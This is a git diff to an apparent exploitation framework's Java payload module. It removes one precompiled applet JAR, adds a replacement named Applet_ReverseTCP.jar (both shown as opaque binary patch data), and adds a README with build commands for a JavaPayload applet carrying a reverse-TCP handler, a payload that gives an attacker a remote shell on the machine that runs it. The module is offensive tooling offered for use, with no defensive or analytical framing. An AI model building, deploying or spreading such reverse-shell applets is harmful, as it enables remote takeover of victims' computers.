diff --git a/modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar b/modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar
deleted file mode 100644
index 2c38c932dcd778cdb93fa0cafae1fde480527c10..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6029
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

diff --git a/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar b/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar
new file mode 100644
index 0000000000000000000000000000000000000000..30e058e874c45988d549d84a4f4ca9fb896252d5
GIT binary patch
literal 6290
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

literal 0
HcmV?d00001

diff --git a/modules/exploits/local_host/java_payload/README.txt b/modules/exploits/local_host/java_payload/README.txt
new file mode 100644
index 000000000..df644a52d
--- /dev/null
+++ b/modules/exploits/local_host/java_payload/README.txt
@@ -0,0 +1,50 @@
+--- How to use this module ---
+The following is how you compile the JavaPayload handlers :
+
+$git clone https://github.com/schierlm/JavaPayload/tree/master/JavaPayload javapayload-git
+$cd javapayload-git/JavaPayload/lib && wget http://download.forge.objectweb.org/asm/asm-3.2.jar
+$cd .. && ant compile && ant jar
+$cd build/bin
+$java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.builder.AppletJarBuilder ReverseTCP
+
+At this point you have the applet ready to go, with a reverseTCP handler:
+Applet_ReverseTCP.jar
+Note that the applet in this module is already compiled (with Java 7, you might want to recompile it
+with Java 6 to run it on those versions too - SUGGESTED :-).
+
